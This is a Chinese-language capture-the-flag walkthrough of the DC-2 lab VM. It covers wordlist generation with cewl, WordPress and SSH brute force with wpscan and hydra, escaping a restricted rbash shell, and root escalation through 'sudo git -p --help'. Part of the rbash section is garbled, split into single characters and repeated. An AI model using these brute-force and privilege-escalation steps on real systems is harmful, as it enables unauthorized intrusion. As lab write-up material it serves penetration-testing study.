- 信息收集
扫描端口
访问网站发现有跳转,但是显示失败,需要我们进行ip和域名绑定
通过/etc/hosts绑定
浏览网站发现flag
大致意思说,你字典有问题,需要cewl工具生成字典
Cewl http://dc-2 -w /tmp/passwd.dict1
- 扫描网站目录
可以通过gobuster 、dirb、metasploit扫描
结果
/index.php (Status: 301)
/wp-content (Status: 301)
/wp-admin (Status: 301)
/readme.html (Status: 200)
/wp-login.php (Status: 200)
/wp-trackback.php (Status: 200)
/wp-content (Status: 301)
/wp-admin (Status: 301)
访问看下
看到如上界面,兄弟们,想的是啥,不用问,当然是爆破他啊,给他个脸了,连验证码都不限制,那就是no作no带(die)
方法1:通过burpsuite去抓包,然后暴力破解
方法2:通过wpscan暴力破解
那么wpscan是什么,他是专门针对wordpress网站的一个工具,它就专一对wordpress有感觉(个人才学尚浅,就当我瞎说的),大家可以网上去看些资料
废话不多说,上命令:
列出wordpress存在的用户名
将用户写入文件中
然后爆破吧,刚才方法给了
这里只演示wpscan爆破方法
命令:
U:指定用户名文件
P:制定密码文件
结果
出来了
登陆网站看看有我们可爱的flag吗
上面是啥,找到了,看看吧
如果没办法去攻击网站,可以采用另一种方式,希望你可以找到另一种方式。
思考中。。。。。,
另一种方法?咱们是不是还有个端口没有利用到呢
好,返回去看看
这个ssh,暴力下吧(I like 和平)
工具,利用hydra
hydra -L /tmp/user.dict -P /tmp/passwd.dict ssh@192.168.25.133:7744 -s
出来了
访问哈
列出文件
想查看没权限
看下自己什么权限
Rbash :rbash就是受限制的bash,一般管理员会限制很多命令
绕过rbash方法:
可以使用
l
e
s
s
l
e
s
s
f
l
a
g
3.
t
x
t
或
者
使
用
这
个
B
A
S
H
C
M
D
S
[
a
]
=
/
b
i
n
/
s
h
;
a
进
入
s
h
e
l
l
然
后
修
改
环
境
变
量
e
x
p
o
r
t
P
A
T
H
=
less less flag3.txt 或者使用这个 BASH_CMDS[a]=/bin/sh;a 进入shell然后修改环境变量 export PATH=
lesslessflag3.txt或者使用这个BASHCMDS[a]=/bin/sh;a进入shell然后修改环境变量exportPATH=PATH:/bin
export PATH=$PATH:/usr/bin
然后可以执行我们的命令了
让我们切换jerry可以找到原因
直接在此shell下切换
我的理解(外语不好,翻译不对勿喷):
你来到这里也许非常快,但是你不还没有到达终点,你仍然需要去获取最后的flag
这里没线索,。。。。(此处省略部分翻译)继续吧,通过git离开这里
那我们最后一步,肯定是进入root(个人认为)
访问root目录权限不足
先去看看passwd目录下jerry具有什么shell吧
Git提权
sudo git -p –help
进入后输入!/bin/bash